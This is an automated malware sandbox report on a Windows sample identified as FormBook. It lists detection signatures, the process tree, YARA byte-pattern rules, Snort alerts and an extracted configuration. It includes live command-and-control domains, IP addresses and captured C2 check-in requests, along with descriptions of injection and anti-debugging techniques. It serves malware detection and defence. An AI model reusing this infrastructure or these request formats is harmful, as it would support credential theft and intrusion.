Loading ...

Play interactive tourEdit tour

Windows Analysis Report mvui1vY6Mo

Overview

General Information

Sample Name:mvui1vY6Mo (renamed file extension from none to exe)
Analysis ID:458944
MD5:059b1244ac9fda54de086692db4b5a08
SHA1:6e5f6326bd9da7e5d9c70b3e4491d308eb7f842b
SHA256:abb29be2c1eccd851bdb99b126e822a8cf0f57be95e9b71a921aa703b2c285be
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mvui1vY6Mo.exe (PID: 6656 cmdline: 'C:\Users\user\Desktop\mvui1vY6Mo.exe' MD5: 059B1244AC9FDA54DE086692DB4B5A08)
    • mvui1vY6Mo.exe (PID: 6704 cmdline: 'C:\Users\user\Desktop\mvui1vY6Mo.exe' MD5: 059B1244AC9FDA54DE086692DB4B5A08)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmmon32.exe (PID: 6336 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
        • cmd.exe (PID: 6380 cmdline: /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ejsuniqueclasses.com/ehp9/"], "decoy": ["kebao100.com", "telco360.com", "gilleyaviation.com", "thedangleman.com", "kmpetersonphoto.com", "bykjsz.com", "comparaca.com", "wlalumsforantiracism.com", "razerzonr.com", "856380062.xyz", "cubesoftwaresolution.com", "atokastore.com", "joinlashedbyjamie.com", "azcorra.com", "lilys-galaxy.com", "wheretheresaytheresaway.com", "avantix-colts.com", "pornsitehub.com", "jagoviral.com", "loansforgiven.com", "bainrix.com", "jesuschrist.care", "gunvue.com", "ijajs.com", "gee825.com", "runninghogfarm.com", "zotaac-ee.com", "secretholeagency.com", "maakapforgoodhealth.com", "lovebodystyles.com", "macrovigilance.com", "attractanygirl.com", "ingawellinc.com", "bet365q8.com", "globalmillionairessclub.com", "marcellaandann.com", "cmnkt-byem.xyz", "wolfzoom.net", "laura-claim.com", "tunnurl.com", "twinedinmagic.com", "libertybaptistchurchmedia.com", "pureembryo.com", "ssdigitaltirunelveli.com", "skiphirescunthorpe.com", "displashop.com", "whitebylole.com", "eggplantreport.com", "rje3.net", "healthpragency.com", "dxdoors.com", "blissbunnyworld.com", "ifn.xyz", "nationalurc.info", "designcumbriauk.com", "sonchirraiyya.com", "466se.com", "bombayy.com", "mairaalves.art", "nazarppe.com", "smokinskiing.com", "redwhitescrewed.com", "quantumnepal.codes", "circusocks.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.mvui1vY6Mo.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.mvui1vY6Mo.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.mvui1vY6Mo.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        0.2.mvui1vY6Mo.exe.2eb0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.mvui1vY6Mo.exe.2eb0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ejsuniqueclasses.com/ehp9/"], "decoy": ["kebao100.com", "telco360.com", "gilleyaviation.com", "thedangleman.com", "kmpetersonphoto.com", "bykjsz.com", "comparaca.com", "wlalumsforantiracism.com", "razerzonr.com", "856380062.xyz", "cubesoftwaresolution.com", "atokastore.com", "joinlashedbyjamie.com", "azcorra.com", "lilys-galaxy.com", "wheretheresaytheresaway.com", "avantix-colts.com", "pornsitehub.com", "jagoviral.com", "loansforgiven.com", "bainrix.com", "jesuschrist.care", "gunvue.com", "ijajs.com", "gee825.com", "runninghogfarm.com", "zotaac-ee.com", "secretholeagency.com", "maakapforgoodhealth.com", "lovebodystyles.com", "macrovigilance.com", "attractanygirl.com", "ingawellinc.com", "bet365q8.com", "globalmillionairessclub.com", "marcellaandann.com", "cmnkt-byem.xyz", "wolfzoom.net", "laura-claim.com", "tunnurl.com", "twinedinmagic.com", "libertybaptistchurchmedia.com", "pureembryo.com", "ssdigitaltirunelveli.com", "skiphirescunthorpe.com", "displashop.com", "whitebylole.com", "eggplantreport.com", "rje3.net", "healthpragency.com", "dxdoors.com", "blissbunnyworld.com", "ifn.xyz", "nationalurc.info", "designcumbriauk.com", "sonchirraiyya.com", "466se.com", "bombayy.com", "mairaalves.art", "nazarppe.com", "smokinskiing.com", "redwhitescrewed.com", "quantumnepal.codes", "circusocks.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: mvui1vY6Mo.exeVirustotal: Detection: 58%Perma Link
          Source: mvui1vY6Mo.exeReversingLabs: Detection: 60%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: mvui1vY6Mo.exeJoe Sandbox ML: detected
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: mvui1vY6Mo.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: mvui1vY6Mo.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\0238f0732c6a40e5a54bccb37ef03c58\Loader\Project1\Release\Project1.pdb source: mvui1vY6Mo.exe
          Source: Binary string: cmmon32.pdbGCTL source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: mvui1vY6Mo.exe, 00000000.00000003.655268474.0000000003240000.00000004.00000001.sdmp, mvui1vY6Mo.exe, 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mvui1vY6Mo.exe, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F431C FindFirstFileExW,0_2_002F431C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F431C FindFirstFileExW,2_2_002F431C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 4x nop then pop esi2_2_00415848
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 4x nop then pop ebx2_2_00406AC2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 4x nop then pop ebx2_2_00406AA2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop esi11_2_008B5848
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx11_2_008A6AA2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx11_2_008A6AC2

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 164.68.104.58:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 164.68.104.58:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 164.68.104.58:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.ejsuniqueclasses.com/ehp9/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.856380062.xyz
          Source: C:\Windows\SysWOW64\cmmon32.exeDNS query: www.856380062.xyz
          Source: global trafficHTTP traffic detected: GET /ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T HTTP/1.1Host: www.ejsuniqueclasses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO HTTP/1.1Host: www.healthpragency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky HTTP/1.1Host: www.circusocks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO HTTP/1.1Host: www.466se.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ILIGHT-NETUS ILIGHT-NETUS
          Source: global trafficHTTP traffic detected: GET /ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T HTTP/1.1Host: www.ejsuniqueclasses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO HTTP/1.1Host: www.healthpragency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky HTTP/1.1Host: www.circusocks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO HTTP/1.1Host: www.466se.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ejsuniqueclasses.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 03 Aug 2021 20:19:35 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.663579400.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: cmmon32.exe, 0000000B.00000002.915247011.0000000000C60000.00000004.00000020.sdmpString found in binary or memory: http://www.856380062.xyz/ehp9/?zZbXur=fPkLdxO&0vrPA=sBJ6lOoTYYoNcaluCGHxKraeNDG0llcp1STurr5zu7Kck/pV
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
